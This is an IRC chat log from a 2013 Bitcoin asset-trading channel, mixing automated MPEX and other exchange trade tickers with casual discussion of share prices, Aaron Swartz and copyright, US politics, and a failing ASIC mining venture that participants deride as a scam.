[MPEX] [S.DICE] 1100 @ 0.00460762 = 5.0684 BTC [-] Jan 12 22:46:55 [MPEX] [S.DICE] 1000 @ 0.00460762 = 4.6076 BTC [-] Jan 12 22:46:57 [MPEX] [S.DICE] 386 @ 0.00458667 = 1.7705 BTC [-] Jan 12 22:49:23 [MPEX] [S.DICE] 350 @ 0.00458667 = 1.6053 BTC [-] Jan 12 22:54:54 wha? Jan 12 22:55:06 no Jan 12 22:55:26 wtf is cryptobills ? Jan 12 22:55:27 o wait, other weex ? Jan 12 22:55:32 i dunno i saw weex there was omfg Jan 12 22:55:34 there is an irc user "weex" Jan 12 22:55:48 ah i c. my bad! Jan 12 22:56:08 i was like ... @,@ Jan 12 22:56:14 i wouldnt ut up a site that.. err n/m Jan 12 22:56:15 :) Jan 12 22:56:20 i have something far better Jan 12 22:56:21 though Jan 12 22:56:22 comming soon Jan 12 22:58:21 cool Jan 12 22:58:50 a bitfunder assbot connection.. can we bribe you Ukto ? Jan 12 22:59:25 ya srsly ? Jan 12 23:02:42 [MPEX] [S.DICE] 650 @ 0.00462102 = 3.0037 BTC [+] Jan 12 23:08:13 well, in case it generates too much traffic you could open it for active coinbr accounts only :) Jan 12 23:08:38 no, in fact i plan to put ads there. Jan 12 23:09:36 yeah, the more mpex grows, u'll be the bitcoincharts of mpex Jan 12 23:10:46 in fact, if anyone would be so bright and came up with sound business model, i'm sure we could do some contract for running it Jan 12 23:11:01 but sadly, that's scarce commodity in this community Jan 12 23:11:43 why do you need a contract Jan 12 23:11:48 i mean Jan 12 23:11:53 just code and run and milk Jan 12 23:12:24 cause i'm lazy. let someone other maintain it, i'll just milk Jan 12 23:14:17 FabianB_: as I have todl the otherw Jan 12 23:14:22 once i get done wiht a big thing right now Jan 12 23:14:28 that I am trying to get launched Jan 12 23:14:31 you will get assbot Jan 12 23:14:35 as a weexchagne user Jan 12 23:14:40 i think you will be happy with this. : Jan 12 23:14:41 :P Jan 12 23:14:43 [MPEX] [S.MPOE] 3293 @ 0.0006592 = 2.1707 BTC [+] Jan 12 23:14:46 :D Jan 12 23:15:20 will wait patiently Jan 12 23:17:08 jurov, how operational is coinbr? Jan 12 23:17:57 how do you mean? Jan 12 23:18:38 everything online afaik Jan 12 23:18:53 Receiving dividends, buying stuff, selling stuff? Jan 12 23:18:58 yes Jan 12 23:19:20 Might try it out once I converted a bit of spare cash into BTC later Jan 12 23:19:56 you're welcome Jan 12 23:20:48 S.DICE seems tempting, dividend wise, don't know about any other MPEX-asset Jan 12 23:22:56 !ticker m * Jan 12 23:22:57 Did you kill the white man who killed you? Jan 12 23:24:10 lol ? Jan 12 23:24:17 dude these sloven jokes are completely hermetic Jan 12 23:24:32 are not slovenian Jan 12 23:24:42 try another one Jan 12 23:24:59 !ticker glbse milk Jan 12 23:25:00 You cannot stop the clouds by the building of a ship. Jan 12 23:25:05 0.1337 btc to whoever figues out where it comes from Jan 12 23:25:21 and not 0.1336, mircea_popescu. Jan 12 23:25:54 'Dead Man' movie from 1995? Jan 12 23:25:58 addy Jan 12 23:26:13 ? Jan 12 23:26:30 1NE3pKoZCFsXQ8nCAkRKBiA9k7VG2PFwWw Jan 12 23:27:13 Odd abbreviation for adress, thanks though! Jan 12 23:27:43 ummm, montenegro ? :D Jan 12 23:28:36 Schadenfreude, sent, now go spend it on hookers and blow on coinbr Jan 12 23:28:56 he can buy trilema credits Jan 12 23:30:04 mircea_popescu, you are missing out, go watch dead man Jan 12 23:30:34 aite. Jan 12 23:30:43 last film i watched i nearly ended up beating innocent girls Jan 12 23:31:22 What film was so awful? Jan 12 23:31:41 reds Jan 12 23:31:50 ;;google trilema reds Jan 12 23:31:51 Trilema! - Samsa - YouTube: ; Munchausen Trilemma - SoundCloud: ; Examining C.S. Lewis' Trilemma: Jan 12 23:31:57 pff. Jan 12 23:32:03 http://trilema.com/2013/why-dont-you-go-as-a-turkey/ Jan 12 23:34:35 Ah, I assume the movie portrays commies as the good guys? Jan 12 23:34:56 nope Jan 12 23:35:17 Well, that's at least one plus point there Jan 12 23:37:38 [MPEX] [S.DICE] 850 @ 0.00461252 = 3.9206 BTC [-] Jan 12 23:37:38 [MPEX] [S.DICE] 538 @ 0.00462102 = 2.4861 BTC [+] Jan 12 23:37:46 I like the way Caucescau~ was dealt with in Romania Jan 12 23:49:17 [MPEX] [S.DICE] 103 @ 0.00460688 = 0.4745 BTC [-] Jan 12 23:49:24 http://www.youtube.com/watch?v=mFgQ01D1Pmk Jan 12 23:53:46 [MPEX] [S.DICE] 1100 @ 0.00460688 = 5.0676 BTC [-] Jan 12 23:56:42 [MPEX] [S.DICE] 1391 @ 0.00462102 = 6.4278 BTC [+] Jan 13 00:00:49 https://bitcointalk.org/index.php?topic=135952.msg1450248#msg1450248 Jan 13 00:00:56 the girl at her finest. Jan 13 00:01:21 [MPEX] [S.DICE] 97 @ 0.00460688 = 0.4469 BTC [-] Jan 13 00:01:23 [MPEX] [S.DICE] 847 @ 0.00458667 = 3.8849 BTC [-] Jan 13 00:03:10 It is purely internal, to wit, the fact that you are worthless as a human being, have no point in this world and your opinions do not matter. Jan 13 00:03:17 same old shit Jan 13 00:04:29 i mean, the rest of reply is fine, i like mpoe-pr. but i don't see any useful purpose to such statements Jan 13 00:04:46 i think she may just be evil. Jan 13 00:05:22 [MPEX] [S.DICE] 1817 @ 0.00458667 = 8.334 BTC [-] Jan 13 00:06:24 [MPEX] [S.DICE] 83 @ 0.00458437 = 0.3805 BTC [-] Jan 13 00:06:24 [MPEX] [S.DICE] 4167 @ 0.00462102 = 19.2558 BTC [+] Jan 13 00:14:19 [MPEX] [S.DICE] 300 @ 0.00457025 = 1.3711 BTC [-] Jan 13 00:14:21 [MPEX] [S.DICE] 189 @ 0.00453297 = 0.8567 BTC [-] Jan 13 00:14:22 [MPEX] [S.DICE] 1400 @ 0.0045328 = 6.3459 BTC [-] Jan 13 00:14:24 [MPEX] [S.DICE] 1200 @ 0.00453124 = 5.4375 BTC [-] Jan 13 00:14:25 [MPEX] [S.DICE] 611 @ 0.0045308 = 2.7683 BTC [-] Jan 13 00:31:54 [MPEX] [S.DICE] 1200 @ 0.00462102 = 5.5452 BTC [+] Jan 13 00:35:27 [MPEX] [S.DICE] 750 @ 0.00462102 = 3.4658 BTC [+] Jan 13 00:47:07 [MPEX] [S.DICE] 300 @ 0.00462102 = 1.3863 BTC [+] Jan 13 00:48:04 [BTCTC] [BASIC-MINING] 5 @ 0.3299 = 1.6495 BTC [-] Jan 13 00:48:06 [BTCTC] [BASIC-MINING] 3 @ 0.33 = 0.99 BTC [+] Jan 13 00:51:39 [MPEX] [S.DICE] 308 @ 0.00455423 = 1.4027 BTC [-] Jan 13 00:51:41 [MPEX] [S.DICE] 342 @ 0.00453081 = 1.5495 BTC [-] Jan 13 00:52:02 [HAVELOCK] [SDICE] 2 @ 0.48 = 0.96 BTC [-] Jan 13 00:57:01 [MPEX] [S.DICE] 658 @ 0.00453081 = 2.9813 BTC [-] Jan 13 00:57:03 [MPEX] [S.DICE] 189 @ 0.0045308 = 0.8563 BTC [-] Jan 13 00:57:04 [MPEX] [S.DICE] 653 @ 0.00453006 = 2.9581 BTC [-] Jan 13 01:10:32 buyers are still overbidding one another in the S.BBET post-IPO period. Now 100001 bit Jan 13 01:10:34 bid Jan 13 01:12:11 !ticker m s.bbet Jan 13 01:12:13 [MPEX:S.BBET] 1D: 0.002 / 0.002 / 0.002 (148 shares, 0.30 BTC), 7D: 0.000337 / 0.00068004 / 0.0035 (1991241 shares, 1,354.13 BTC), 30D: 0.000337 / 0.00068004 / 0.0035 (1991241 shares, 1,354.13 BTC) Jan 13 01:12:46 !ticker h sdice Jan 13 01:12:47 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.48 / 0.48000000 (64 shares, 30.72000000 BTC), 7D: 0.47500000 / 0.48099029 / 0.50999999 (1853 shares, 891.27499998 BTC), 30D: 0.37000000 / 0.44956487 / 0.62000000 (3137 shares, 1410.28499998 BTC) Jan 13 01:13:00 mircea_popescu are you in Cluj? Jan 13 01:13:03 nah Jan 13 01:13:07 timisoara. Jan 13 01:13:08 why ? Jan 13 01:13:51 Trying to get some real estate data for an idea I'm working on... looked up the founder of property shark.com and he is now in Cluj Jan 13 01:13:53 of all places Jan 13 01:14:31 hehe. Jan 13 01:14:34 i was born there. Jan 13 01:14:44 http://www.linkedin.com/profile/view?id=19738536&authType=NAME_SEARCH&authToken=St0M&locale=en_US&srchid=004655ad-5487-4039-9a81-84070c446498-0&srchindex=7&srchtotal=80&goback=%2Efps_PBCK_*1_Matthew_Haines_*1_*1_*1_*1_*2_*1_Y_*1_*1_*1_false_1_R_*1_*51_*1_*51_true_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2&pvs=ps&trk=pp_profile_name_link Jan 13 01:14:47 ugh Jan 13 01:14:52 ugly link Jan 13 01:15:21 time one times one times two times one Jan 13 01:15:22 cluj is a 500k pop town Jan 13 01:15:41 and i don't have a linkedin acct. Jan 13 01:17:06 aiight Jan 13 01:17:30 anyway, romania real estate is fucked, whatever he asks for offer half. Jan 13 01:27:10 neat, ff has blocked java? Jan 13 01:29:20 [MPEX] [S.DICE] 431 @ 0.00457266 = 1.9708 BTC [+] Jan 13 01:29:21 heh Jan 13 01:29:22 [MPEX] [S.DICE] 297 @ 0.00453006 = 1.3454 BTC [-] Jan 13 01:29:23 [MPEX] [S.DICE] 24 @ 0.00452995 = 0.1087 BTC [-] Jan 13 01:29:51 no I'm thinking of doing price optimization for US luxury RE Jan 13 01:30:09 I think we can develop an algorithm that destroys zillow Jan 13 01:30:20 which is a 1BB company Jan 13 01:31:39 mircea_popescu: what's with the bot Jan 13 01:31:44 which ? Jan 13 01:31:55 MPOE Jan 13 01:32:01 Bugpowder if you do that i'll list you. Jan 13 01:32:07 thestringpuller be moar speciffix. Jan 13 01:32:29 heh Jan 13 01:33:22 Why does no one use monte carlo... Jan 13 01:33:32 lack of computing power? Jan 13 01:33:35 If it works, I'm sure many people will want to Jan 13 01:33:41 LOL Jan 13 01:33:44 thestringpuller Jan 13 01:33:59 monte carlo does not take much power dude Jan 13 01:34:02 [MPEX] [S.DICE] 1476 @ 0.00452995 = 6.6862 BTC [-] Jan 13 01:34:02 for some bitcoin options Jan 13 01:34:02 [MPEX] [S.DICE] 1250 @ 0.00452938 = 5.6617 BTC [-] Jan 13 01:34:04 [MPEX] [S.DICE] 174 @ 0.0045293 = 0.7881 BTC [-] Jan 13 01:34:14 ya but mine is teh best :D Jan 13 01:34:26 then why not take larger samples Jan 13 01:34:32 huh? Jan 13 01:34:36 larger samples? Jan 13 01:34:57 ppl use plenty of mc on sd Jan 13 01:35:11 S.DICE? Jan 13 01:35:19 Bugpowder: price paths* Jan 13 01:35:20 mircea_popescu, if your exchange has the capital to support a $1BB market cap, then we can talk Jan 13 01:35:36 also Jan 13 01:35:48 when I have something more than a napkin sketch Jan 13 01:35:57 and a few team members Jan 13 01:36:06 pfff, fuck that shit, you don't want 1 bn fiats Jan 13 01:36:12 you want a good chunk of btc. Jan 13 01:37:46 I want $10MM in my bank account Jan 13 01:37:54 that's trivial. Jan 13 01:37:55 I'll convert some to coins Jan 13 01:38:42 let me explain how this is gonna work Jan 13 01:38:53 by this time next year mpex will have many times the total BTC M3 in mkt cap Jan 13 01:39:07 and a good chunk of btc trade to fiat will be winding and unwinding of mpex positions Jan 13 01:39:12 BTC has M3 now Jan 13 01:39:16 with s.mpoe acting as a sort of bitcoin federal reserve notes Jan 13 01:39:26 (inelastic commodity overpriced through reservation demand) Jan 13 01:39:56 yes thestringpuller . nominal 21mn, actualised like 12. Jan 13 01:40:28 i guess the year 2100 is far away for many of us Jan 13 01:48:29 [MPEX] [S.DICE] 726 @ 0.0045293 = 3.2883 BTC [-] Jan 13 01:48:31 [MPEX] [S.DICE] 1050 @ 0.00452833 = 4.7547 BTC [-] Jan 13 01:48:32 [MPEX] [S.DICE] 900 @ 0.00452616 = 4.0735 BTC [-] Jan 13 01:48:33 [MPEX] [S.DICE] 424 @ 0.0045252 = 1.9187 BTC [-] Jan 13 01:48:38 !ticker m s.dice Jan 13 01:48:40 [MPEX:S.DICE] 1D: 0.0045252 / 0.0045811 / 0.00470807 (166931 shares, 764.73 BTC), 7D: 0.00430002 / 0.00467389 / 0.0048 (1865198 shares, 8,717.74 BTC), 30D: 0.0014 / 0.00349631 / 0.0048 (14501819 shares, 50,702.91 BTC) Jan 13 01:49:27 ;;ticker Jan 13 01:49:28 BTCUSD ticker | Best bid: 14.19002, Best ask: 14.23699, Bid-ask spread: 0.04697, Last trade: 14.19002, 24 hour volume: 26935.14538155, 24 hour low: 13.97500, 24 hour high: 14.33800, 24 hour vwap: 14.16725 Jan 13 01:52:14 [MPEX] [S.DICE] 1500 @ 0.00457307 = 6.8596 BTC [+] Jan 13 01:58:56 [MPEX] [S.DICE] 45 @ 0.00457307 = 0.2058 BTC [+] Jan 13 02:01:14 mircea_popescu: 15:39 < mircea_popescu> with s.mpoe acting as a sort of bitcoin federal reserve notes <-- careful making statements like that, unless you are deliberately trying to make a target of yourself. Jan 13 02:01:28 in which case, carry on. :) Jan 13 02:01:30 lol Jan 13 02:01:52 in truth, i'm a better target than most btc people, someone will have to be a target for the common good, what am i to do ? Jan 13 02:06:50 mircea_popescu: "TIL since 1950, every US shooting which has killed three or more people (except for the Congresswoman Gifford shooting) has taken place in areas where citizens are not allowed to carry guns." Jan 13 02:07:07 myeah. Jan 13 02:07:24 and the congresswoman shooting was so clearly a statal political assasination it bleeds. Jan 13 02:07:36 heh Jan 13 02:12:00 http://upload.wikimedia.org/wikipedia/commons/e/e0/Failed-states-index-2011.png Jan 13 02:12:11 til : according to sillypedia, the us and canada both are failed states. Jan 13 02:12:14 (to some degree) Jan 13 02:12:34 and so is everywhere else Jan 13 02:12:53 [MPEX] [S.DICE] 1450 @ 0.00462102 = 6.7005 BTC [+] Jan 13 02:26:55 [MPEX] [S.DICE] 316 @ 0.00461956 = 1.4598 BTC [-] Jan 13 02:33:47 >offtopic - i am curious though how mpex has killed off the stupid bullshit prices of mining 'stocks' 'bonds' whatever you wanna callem when mpex primarily has its own asset, two gambling assets, and hosting company, and no miners? again, nothing aginst the type/quality/number of assets on mpex, just comparing types.. are you meaning overall btc price adjustments? i think the impressive Jan 13 02:33:48 pricing for stocks issued on mpex have done some pretty neat things esp. for each other, just not sure how it effects other types of 'assets' on other markets. not trying to be rude, just want your thoughts on it in a conversely manner. Jan 13 02:34:04 by effectivley valueing them zero. Jan 13 02:34:05 :D Jan 13 02:35:23 using IE like a boss Jan 13 02:36:54 kakobrekla link? Jan 13 02:37:04 I feel like making a little graphic for people Jan 13 02:37:24 https://bitcointalk.org/index.php?topic=135952.msg1450491#msg1450491 Jan 13 02:37:49 there is no embedded graphics on the forum right? Jan 13 02:37:58 pics allowed Jan 13 02:38:11 at least they were Jan 13 02:38:35 oh Jan 13 02:38:36 cool Jan 13 02:42:02 [HAVELOCK] [SDICE] 1 @ 0.48 BTC [-] Jan 13 02:48:33 kakobrekla i tihnk you have it Jan 13 02:49:08 how does a cinema opening up run the old cafe's out of business ? well... cause the kids go to the cinema instead. Jan 13 02:49:11 presto. Jan 13 02:51:54 Bugpowder i rtell you this much, if you make a whatever killer and don't list it i'll be heartbroken Jan 13 02:57:21 [MPEX] [S.DICE] 176 @ 0.0045252 = 0.7964 BTC [-] Jan 13 02:57:21 [MPEX] [S.DICE] 224 @ 0.00452444 = 1.0135 BTC [-] Jan 13 02:59:01 Mission accomplished https://bitcointalk.org/index.php?topic=135952.msg1450526#msg1450526 Jan 13 02:59:55 mircea_popescu If my thing works, it will probably be acquired before it can go public. Think mint.com. 3 years after it was founded, Intuit bought it for $170MM Jan 13 03:00:07 holy fucking shit Jan 13 03:00:21 Joe Flacco Jan 13 03:00:47 hail mary. 55 yards in the air Jan 13 03:01:08 Baltimore is definitley going to cover now Jan 13 03:01:11 and they might win Jan 13 03:01:42 :D Jan 13 03:03:26 Bugpowder: are you making charts? Jan 13 03:03:48 heh Jan 13 03:03:53 just for fun Jan 13 03:04:16 Flacco threw that 60 yeards in the air, in 0F weather. Jan 13 03:04:31 I don't think anyone thought he could throw the ball so far Jan 13 03:04:36 mint.com Jan 13 03:04:40 lol Jan 13 03:04:44 lol? Jan 13 03:04:53 the quiken people bought them? Jan 13 03:04:54 do you use it? Jan 13 03:04:55 yeah Jan 13 03:05:08 they felt threatened Jan 13 03:05:33 I used to use them because they have awesome charts. Jan 13 03:05:44 I want to make my own chart API like they have. Jan 13 03:05:53 why not use lightbox Jan 13 03:06:06 zillow uses lightbox Jan 13 03:06:26 expense tracker? Jan 13 03:06:37 or what Jan 13 03:06:39 finances tracker Jan 13 03:06:45 [MPEX] [S.DICE] 550 @ 0.00455459 = 2.505 BTC [+] Jan 13 03:06:51 but SUPER easy to use Jan 13 03:06:59 automatically links to all your accounts Jan 13 03:07:02 Because I want charts not just for a webpage? Jan 13 03:07:09 oh Jan 13 03:07:23 I just use matlab for anything real Jan 13 03:07:33 R is good too Jan 13 03:07:36 and free Jan 13 03:07:43 Mint is awesome Jan 13 03:07:57 super easy and also very useful Jan 13 03:08:14 I just want the chart api Jan 13 03:08:18 and pretty good revenue model with targeted ads Jan 13 03:08:21 so I can push data in and have a pretty graphic come out the other end Jan 13 03:08:38 I dunno much about apis Jan 13 03:08:47 what about mouse brains? Jan 13 03:09:05 matplotlib for python is good Jan 13 03:09:28 r is it. Jan 13 03:15:01 [MPEX] [S.DICE] 800 @ 0.00452444 = 3.6196 BTC [-] Jan 13 03:15:49 ;;seen smickles Jan 13 03:15:49 smickles was last seen in #bitcoin-assets 2 days, 6 hours, 53 minutes, and 23 seconds ago: ;;ticker Jan 13 03:15:52 SMICKLES Jan 13 03:15:55 WHERE ARE YOU! Jan 13 03:15:55 lol Jan 13 03:15:59 man S.DICE is getting pounded tonight Jan 13 03:17:53 http://www.nypost.com/p/news/local/brooklyn/reddit_co_founder_commits_suicide_AZPHGFSHzBRrOHbx2yGM9O Jan 13 03:18:12 yah Jan 13 03:18:20 first reported in The Tech Jan 13 03:19:11 http://tech.mit.edu/V132/N61/swartz.html Jan 13 03:19:48 http://techblogs.mit.edu/news/2013/01/the-techs-coverage-of-aaron-swartz/ Jan 13 03:20:12 A big moment in MIT journalism. Jan 13 03:20:17 if this won't sink the entire copyright thing i don't know what will. Jan 13 03:20:42 Its almost dead Jan 13 03:20:45 for science stuff Jan 13 03:21:19 Wellcome, HHMI, NIH are requiring everything be posted to open access server within 6 months of publication Jan 13 03:21:26 or no funding for you Jan 13 03:21:59 holy Jan 13 03:22:04 wow Jan 13 03:22:05 wtf Jan 13 03:22:18 makes sense. Jan 13 03:22:21 is that on reddit? Jan 13 03:22:24 yeah Jan 13 03:22:29 FP Jan 13 03:22:35 I don't see it :3 Jan 13 03:22:45 Probably because I unsubb'd from a lot of the spammy ones Jan 13 03:22:45 it wuz there Jan 13 03:22:48 yeah Jan 13 03:22:56 I only see it if I'm not logged in Jan 13 03:23:00 i think its r/pics Jan 13 03:24:13 wait Jan 13 03:24:18 so he martyr'd himself Jan 13 03:24:44 dont take (younger?) people to fed court over downloading BOOKS Jan 13 03:24:44 http://trilema.com/2013/how-many-more-dead-kids-needed-to-prop-up-boring-industries-of-america-bottomline/ Jan 13 03:24:56 and thretening with years in prison and fines Jan 13 03:24:58 ;P Jan 13 03:25:11 mircea_popescu: from the topic i think were on the same page Jan 13 03:25:12 lol Jan 13 03:25:21 yeah. Jan 13 03:25:47 you know, i write a program, and want to be paid for it, do ihave to right to put someone i prison for years because they wanted to use it? Jan 13 03:26:16 sure i want to get paid for my work.. but at what expense? Jan 13 03:26:42 JSTOR isn't paying the authors of the work Jan 13 03:26:50 the government killed him. with their inadequat copyright system Jan 13 03:27:06 [MPEX] [S.DICE] 16 @ 0.00455459 = 0.0729 BTC [+] Jan 13 03:27:08 [MPEX] [S.DICE] 484 @ 0.00459701 = 2.225 BTC [+] Jan 13 03:28:48 what Bugpowder said Jan 13 03:28:56 it has nothing to do with paying authors, this Jan 13 03:28:59 it's simple extortion. Jan 13 03:29:21 i wanna see terrorism charges against jstor now. Jan 13 03:29:48 some asswipe can burn themselves with mcdo coffee and get a ton in civil Jan 13 03:29:56 most of these journals charge to publish in them Jan 13 03:30:05 mircea_popescu: actually i believe that they settled. they didnt "win" Jan 13 03:30:07 i wanna see jstor hauled off to jail like, completely. charged with murder 1, let the judge decide. Jan 13 03:30:13 no precident was made. on the mcd coffee Jan 13 03:30:30 how many people work for them ? a coupla hundred ? should make a nice trial. Jan 13 03:31:29 [MPEX] [S.DICE] 550 @ 0.00452444 = 2.4884 BTC [-] Jan 13 03:31:50 ive done it Jan 13 03:32:03 automated transfer to bank Jan 13 03:32:20 woot i can spend btc on mcd coffee now Jan 13 03:32:43 There is some value that top journals like Nature provide, via good editorial staff, reviewers, etc, and its reasonable that they have the right to charge for access to the papers, for a time long enough to encourage revenue from the 'professionals' but short enough so that the public can access publicly funded research for free. Jan 13 03:33:34 yeah. Jan 13 03:33:36 most of the shit on JSTOR is old though Jan 13 03:33:45 like I bet the mean age is 30 years old Jan 13 03:34:24 After 3-6 months, that shit should be public Jan 13 03:34:47 if your business model doesn't allow it, then let google do it for you Jan 13 03:35:39 and shut down your service Jan 13 03:35:40 if your "business model" doesn't allow it you'ren ot in business Jan 13 03:36:37 ;;ticker Jan 13 03:36:38 BTCUSD ticker | Best bid: 14.27395, Best ask: 14.29500, Bid-ask spread: 0.02105, Last trade: 14.27395, 24 hour volume: 26689.26805920, 24 hour low: 13.97500, 24 hour high: 14.33800, 24 hour vwap: 14.16793 Jan 13 03:42:00 So. What do you think the next trade of S.BBET will go off at? Jan 13 03:42:05 >150 or under? Jan 13 03:42:39 mmm Jan 13 03:42:47 but i mean... its easy to do either way lol Jan 13 03:42:51 just sell/buy some Jan 13 03:43:06 this is why its not on bitbet Jan 13 03:43:33 :p Jan 13 03:43:36 i have no idea Jan 13 03:43:53 too easy to manipulate Jan 13 03:43:57 I'm just polling here Jan 13 03:47:10 duck Jan 13 03:47:10 fuck Jan 13 03:47:17 Dever loses Jan 13 03:47:26 Denver Jan 13 03:47:40 shit Jan 13 03:47:50 [MPEX] [S.DICE] 731 @ 0.00452444 = 3.3074 BTC [-] Jan 13 03:48:26 odds were 2:9 Jan 13 03:49:34 heh Jan 13 03:49:59 “There are only two options to deal with the debt limit: Congress can pay its bills or it can fail to act and put the nation into default," Carney said. Jan 13 03:50:02 duck tales woohoo Jan 13 03:50:03 fucking bullshit this Jan 13 03:50:10 THEY ARE NOT CONGRESS' BILLS!!! Jan 13 03:50:30 ;;ticker Jan 13 03:50:31 BTCUSD ticker | Best bid: 14.27391, Best ask: 14.27395, Bid-ask spread: 0.00004, Last trade: 14.27396, 24 hour volume: 26546.17593283, 24 hour low: 13.97500, 24 hour high: 14.33800, 24 hour vwap: 14.16749 Jan 13 03:51:38 "When congressional Republicans played politics with this issue last time, putting us at the edge of default, it was a blow to our economic recovery, causing our nation’s credit rating to be downgraded. The president and the American people won’t tolerate congressional Republicans holding the American economy hostage again simply so they can force disastrous cuts to Medicare and other programs the middle class dep Jan 13 03:51:38 end on while protecting the wealthy. Congress needs to do its job.” Jan 13 03:51:46 since when the fuck does the president "tolerate" congress Jan 13 03:51:53 what the heck is going on in that failed state omg! Jan 13 03:52:01 All spending bills must originate in the house Jan 13 03:52:15 *hanbot* oh Jan 13 03:53:29 i see massive upside for btc in 2013. Jan 13 03:54:00 who the fuck doesn't Jan 13 03:54:03 well Jan 13 03:54:07 a lot of people actually Jan 13 03:54:20 but really Jan 13 03:54:40 I just keep seeing my bitcoin investments increasing exponentially in $ terms Jan 13 03:54:53 Is good Jan 13 03:55:56 Bugpowder back in like august i wrote a piece about "how do the jooz make money" Jan 13 03:56:31 showing sometyhing like in april 1bn s.mpoe x 9k satoshi x 5 usd per btc x 3 ron / usd = x Jan 13 03:56:57 and then in august 1bn x 27k satoshi x 11 usd/btc x 3.5 ron/ usd = many times x Jan 13 03:57:12 meanwhile it has been further invalidated. Jan 13 04:00:55 https://www.btcfpga.com/forum/index.php?topic=1041.msg3093#msg3093 Jan 13 04:02:42 what is the ron unit? Jan 13 04:02:43 ;;ticker Jan 13 04:02:43 BTCUSD ticker | Best bid: 14.20001, Best ask: 14.27000, Bid-ask spread: 0.06999, Last trade: 14.20001, 24 hour volume: 26605.19759356, 24 hour low: 13.97500, 24 hour high: 14.33800, 24 hour vwap: 14.16738 Jan 13 04:04:40 romanian leu Jan 13 04:06:37 Lukas met with Tom yesterday to discuss the transfer of ownership. We followed up that meeting with a request to meet in the evening so that we could provide a cash-out offer. He declined the meeting and let us know that we could meet today. Jan 13 04:06:37 Today, he has not responded to any of our attempts to contact him. No one was at home, his was not at his office. At this time, Tom's whereabouts are unknown to us. Jan 13 04:06:40 this sounds kinda bad. Jan 13 04:07:53 [MPEX] [O.BTCUSD.C140T] 5 @ 0.14775821 = 0.7388 BTC [+] Jan 13 04:12:46 http://www.youtube.com/watch?v=-WCFUGCOLLU Jan 13 04:15:26 With regard to BTC refunds, I have sent all refund requests to Tom for processing. I have also processed all credit card refund requests at this time. I can't guarantee that the funds were there to back these refunds - I have no way to know this, and Tom never confirmed having done the bank transfer. At this point, if you are thinking of sending me a refund request, I recommend you do a chargeback instead. Jan 13 04:17:38 I am impressed Jan 13 04:22:02 bASIC? Jan 13 04:25:17 [MPEX] [S.DICE] 700 @ 0.00455927 = 3.1915 BTC [+] Jan 13 04:27:37 total scam Jan 13 04:33:13 [BTCTC] [COGNITIVE] 35 @ 0.42 = 14.7 BTC [-] Jan 13 04:33:32 zomgbbq https://bitcointalk.org/index.php?topic=136044.msg1450671;topicseen#msg1450671 Jan 13 04:33:57 shit keeps getting weirder Jan 13 04:39:06 what abou tit? Jan 13 04:39:24 Bugpowder not a scam to start with, just some dumbass sering the bfl scam and thinking why not me Jan 13 04:39:27 then full blown scam. Jan 13 04:44:21 I think we finally found an exchange that is uglier than MPEX Jan 13 04:44:28 we ?! Jan 13 04:45:02 Bugpowder :DD Jan 13 05:00:20 [BTCTC] [RSM] 1 @ 0.0063 BTC [-] Jan 13 05:00:56 [BTCTC] [RSM] 1 @ 0.0064 BTC [+] Jan 13 05:10:52 [BTCTC] [RSM] 1 @ 0.0068 BTC [+] Jan 13 05:11:18 Send the corresponding amount in uncolored bitcoins to 1FL8nGQzRF6j39566viJQ12KnYeBY9kurm Jan 13 05:11:18 Notify us on notification11122@dudmail.com and include the address where you want to receive the colored coins. Jan 13 05:11:21 this sounds promising. Jan 13 05:11:28 [MPEX] [S.BBET] 1000 @ 0.002 = 2 BTC [+] Jan 13 05:12:36 seems it was over 15 Jan 13 05:16:29 ha! Jan 13 05:16:34 I continue to win Jan 13 05:16:39 those are my shares Jan 13 05:16:54 what did you pay for em? Jan 13 05:17:12 average of .000652 Jan 13 05:17:25 but a range from .5-1.0 Jan 13 05:17:39 not bad Jan 13 05:18:23 I wish I got more Jan 13 05:18:33 nervous about regret selling at .002 Jan 13 05:20:35 if the forum ppl hear about this buying 6 selling 20 they may have a stroke Jan 13 05:21:08 Ive been in talks with members from the Bitcoin community and thank God Jan 13 05:21:08 it Looks more like the Bitcoin community itself will be buying this company - not some un-known asian company Jan 13 05:21:12 so fucking ridiculous Jan 13 05:21:20 HE CALLS IT SOME UNKNOWN AZN COMPANY Jan 13 05:21:25 the ppl he brings in to buyout. Jan 13 05:21:38 the best part is... Jan 13 05:21:48 the mob running las vegas in the 70s is nowherhe near as incompetent Jan 13 05:21:52 as "the people" running bitcoin. Jan 13 05:22:13 [MPEX] [S.DICE] 550 @ 0.00455927 = 2.5076 BTC [+] Jan 13 05:22:15 [MPEX] [S.DICE] 639 @ 0.00459701 = 2.9375 BTC [+] Jan 13 05:22:25 is buzzdave part of btcFPGA? Jan 13 05:22:34 or part of the buying group Jan 13 05:22:54 [MPEX] [S.BBET] 1000 @ 0.002 = 2 BTC [+] Jan 13 05:22:57 he's part of the people getting fucked in the ass (tm) Jan 13 05:23:24 this is how these scams unwind, pirate ruined a bunch of names which hung on to him for no reason Jan 13 05:23:35 other than the sickly desire of attention social media builds in kids. Jan 13 05:26:15 [MPEX] [S.DICE] 127 @ 0.00459701 = 0.5838 BTC [+] Jan 13 05:26:17 [MPEX] [S.DICE] 899 @ 0.00462102 = 4.1543 BTC [+] Jan 13 05:26:37 [BTCTC] [COGNITIVE] 1 @ 0.41 BTC [-] Jan 13 05:27:08 [BTCTC] [COGNITIVE] 10 @ 0.4009 = 4.009 BTC [-] Jan 13 05:32:07 These new people have a few things the project can really use: active involvement with Bitcoin, technical expertise, connections, experience, money. No its not any of our competitors. You will learn who the players are only when the deal is done and everything is nailed down. Jan 13 05:32:07 Due to the delay with chip fab, the new team believes we *must* provide proof-of-tech. Tomorrow I will post up a hard date by which we will deliver a video showing a hashing unit. This will not be a production unit, but it will show that the hard work has been done (the chips work, the PCB design is complete). Jan 13 05:32:16 so tom is walking away but the chips work abnd the pcb is complete. Jan 13 05:32:20 lordy. Jan 13 05:40:09 [MPEX] [S.DICE] 1200 @ 0.00452787 = 5.4334 BTC [-] Jan 13 05:40:11 [MPEX] [S.DICE] 1577 @ 0.00462102 = 7.2873 BTC [+] Jan 13 05:40:50 mircea_popescu: well it makes sense. Jan 13 05:40:52 you work on a project Jan 13 05:41:06 get it to a succesful place, then dissapear. Jan 13 05:41:08 drop he ball Jan 13 05:41:14 :P Jan 13 05:42:17 ya im sure people do this all the time Jan 13 05:42:25 because stress and click buffers. Jan 13 05:43:09 just like bfl, the chips are ready no wait we're redoing the design Jan 13 05:53:47 